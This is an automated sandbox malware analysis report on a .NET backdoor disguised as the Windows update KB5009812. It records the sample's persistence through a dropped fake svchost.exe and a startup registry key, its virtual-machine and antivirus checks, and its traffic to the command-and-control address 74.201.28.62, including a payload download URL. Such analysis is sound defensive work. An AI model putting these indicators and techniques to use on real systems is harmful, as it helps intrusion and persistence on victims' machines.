Loading ...

Play interactive tourEdit tour

Windows Analysis Report 45I8GbQlUj

Overview

General Information

Sample Name:45I8GbQlUj (renamed file extension from none to exe)
Analysis ID:553487
MD5:1b1e4286625bb189a526e910f2031c7b
SHA1:650c0550f12c65d9841d10ab589ff39261018957
SHA256:c9d7cb68dec80469c3c03b0e90c7af1972462ca7779424db3bfd9d44aebaa624
Tags:32exe
Infos:

Most interesting Screenshot:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Machine Learning detection for sample
.NET source code contains potential unpacker
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Drops PE files with benign system names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Stores files to the Windows start menu directory
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • 45I8GbQlUj.exe (PID: 6100 cmdline: "C:\Users\user\Desktop\45I8GbQlUj.exe" MD5: 1B1E4286625BB189A526E910F2031C7B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 45I8GbQlUj.exeVirustotal: Detection: 24%Perma Link
Source: 45I8GbQlUj.exeReversingLabs: Detection: 20%
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exeVirustotal: Detection: 24%Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exeReversingLabs: Detection: 20%
Machine Learning detection for sampleShow sources
Source: 45I8GbQlUj.exeJoe Sandbox ML: detected
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exeJoe Sandbox ML: detected
Source: 45I8GbQlUj.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.4:49760 -> 74.201.28.62:80
Source: Joe Sandbox ViewASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
Source: global trafficHTTP traffic detected: GET /book/KB5009812.png HTTP/1.1Host: 74.201.28.62Connection: Keep-Alive
Source: global trafficTCP traffic: 192.168.2.4:49800 -> 74.201.28.62:5586
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: 45I8GbQlUj.exe, svchost.exe.0.drString found in binary or memory: http://74.201.28.62/book/KB5009812.png
Source: global trafficHTTP traffic detected: GET /book/KB5009812.png HTTP/1.1Host: 74.201.28.62Connection: Keep-Alive
Source: 45I8GbQlUj.exe, 00000000.00000003.774232886.000000001B822000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKB5009812.exe. vs 45I8GbQlUj.exe
Source: 45I8GbQlUj.exe, 00000000.00000000.650035857.0000000000452000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameKB5009812.exe. vs 45I8GbQlUj.exe
Source: 45I8GbQlUj.exe, 00000000.00000003.774253369.000000001B829000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKB5009812.exe. vs 45I8GbQlUj.exe
Source: 45I8GbQlUj.exeBinary or memory string: OriginalFilenameKB5009812.exe. vs 45I8GbQlUj.exe
Source: 45I8GbQlUj.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: svchost.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exe C9D7CB68DEC80469C3C03B0E90C7AF1972462CA7779424DB3BFD9D44AEBAA624
Source: 45I8GbQlUj.exeVirustotal: Detection: 24%
Source: 45I8GbQlUj.exeReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\45I8GbQlUj.exeFile read: C:\Users\user\Desktop\45I8GbQlUj.exeJump to behavior
Source: 45I8GbQlUj.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\45I8GbQlUj.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\45I8GbQlUj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\45I8GbQlUj.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exeJump to behavior
Source: classification engineClassification label: mal92.evad.winEXE@1/2@0/1
Source: C:\Users\user\Desktop\45I8GbQlUj.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\Desktop\45I8GbQlUj.exeMutant created: \Sessions\1\BaseNamedObjects\EBA27E1D48D738BA9535923048CE6DEA
Source: C:\Users\user\Desktop\45I8GbQlUj.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 45I8GbQlUj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 45I8GbQlUj.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: 45I8GbQlUj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation:

barindex
.NET source code contains potential unpackerShow sources
Source: 45I8GbQlUj.exe, CoreApi.cs.Net Code: Start System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: svchost.exe.0.dr, CoreApi.cs.Net Code: Start System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.45I8GbQlUj.exe.450000.0.unpack, CoreApi.cs.Net Code: Start System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 45I8GbQlUj.exeStatic PE information: 0x964C769C [Sat Nov 27 02:38:20 2049 UTC]

Persistence and Installation Behavior:

barindex
Drops PE files with benign system namesShow sources
Source: C:\Users\user\Desktop\45I8GbQlUj.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exeJump to dropped file
Source: C:\Users\user\Desktop\45I8GbQlUj.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exeJump to dropped file

Boot Survival:

barindex
Creates an undocumented autostart registry key Show sources
Source: C:\Users\user\Desktop\45I8GbQlUj.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exeJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeKey value created or modified: HKEY_CURRENT_USER\Software\EBA27E1D48D738BA9535923048CE6DEA PluginJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\45I8GbQlUj.exe TID: 4600Thread sleep time: -35000s >= -30000s
Source: C:\Users\user\Desktop\45I8GbQlUj.exe TID: 6508Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Users\user\Desktop\45I8GbQlUj.exe TID: 6508Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\45I8GbQlUj.exe TID: 4600Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\45I8GbQlUj.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\45I8GbQlUj.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWindow / User API: threadDelayed 2504
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWindow / User API: threadDelayed 7303
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\45I8GbQlUj.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\45I8GbQlUj.exeThread delayed: delay time: 30000
Source: C:\Users\user\Desktop\45I8GbQlUj.exeThread delayed: delay time: 922337203685477
Source: 45I8GbQlUj.exe, 00000000.00000003.662613955.0000000000A90000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\45I8GbQlUj.exeMemory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Users\user\Desktop\45I8GbQlUj.exe VolumeInformation
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll VolumeInformation
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\45I8GbQlUj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation221Registry Run Keys / Startup Folder11Registry Run Keys / Startup Folder11Masquerading11OS Credential DumpingSecurity Software Discovery221Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsModify Registry1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion131SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion131NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSystem Information Discovery213SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
45I8GbQlUj.exe25%VirustotalBrowse
45I8GbQlUj.exe21%ReversingLabsByteCode-MSIL.Backdoor.Zlugin
45I8GbQlUj.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exe25%VirustotalBrowse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exe21%ReversingLabsByteCode-MSIL.Backdoor.Zlugin

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://74.201.28.62/book/KB5009812.png0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://74.201.28.62/book/KB5009812.pngtrue
  • Avira URL Cloud: safe
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
74.201.28.62
unknownUnited States
35913DEDIPATH-LLCUStrue

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:553487
Start date:15.01.2022
Start time:01:13:15
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 41s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:45I8GbQlUj (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:15
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal92.evad.winEXE@1/2@0/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
  • TCP Packets have been reduced to 100
  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 204.79.197.222
  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fp.msedge.net, a-0019.a-msedge.net, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, a-0019.standard.a-msedge.net, store-images.s-microsoft.com-c.edgekey.net, 1.perf.msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

TimeTypeDescription
01:14:05API Interceptor443x Sleep call for process: 45I8GbQlUj.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exe
Process:C:\Users\user\Desktop\45I8GbQlUj.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):54272
Entropy (8bit):4.125149292696976
Encrypted:false
SSDEEP:192:s7yxMfjf6NrLqKZ6mXS9LzL1pvULIRPqY2F3991ZuBhyY8PGCz9QwAOSZCGQyBbf:KyufjSLq86mXS9LzLdqY2LHZ4cZA
MD5:1B1E4286625BB189A526E910F2031C7B
SHA1:650C0550F12C65D9841D10AB589FF39261018957
SHA-256:C9D7CB68DEC80469C3C03B0E90C7AF1972462CA7779424DB3BFD9D44AEBAA624
SHA-512:68F2366606B658FDDB2B5E9BAE2E6931FB455A230F8A4813EACB38A3D7853B9640F46FE9EE6FFD9862A509558B66C30A3494CB7231C3EF7CD784950771273155
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
  • Antivirus: Virustotal, Detection: 25%, Browse
  • Antivirus: ReversingLabs, Detection: 21%
Reputation:low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....vL..........."...0..............5... ...@....@.. ....................... ............@..................................4..O....@..\............................4............................................... ............... ..H............text........ ...................... ..`.rsrc...\....@......................@..@.reloc..............................@..B.................4......H........#..`............3...............................................0..:........(.......(....(.....s......o.....(.......(....(.......+..*".(.....*..0............ ...(....r...p......%.."...(.....(...........%. N..."....o....&. ....(........&.....&...(....r...pr5..pr9..p(..........%..'...(.....(....s..........%.r;..p.o....t.....+..*........B..Q.......0..7.........(.............,.....i(.....(.....o....&s 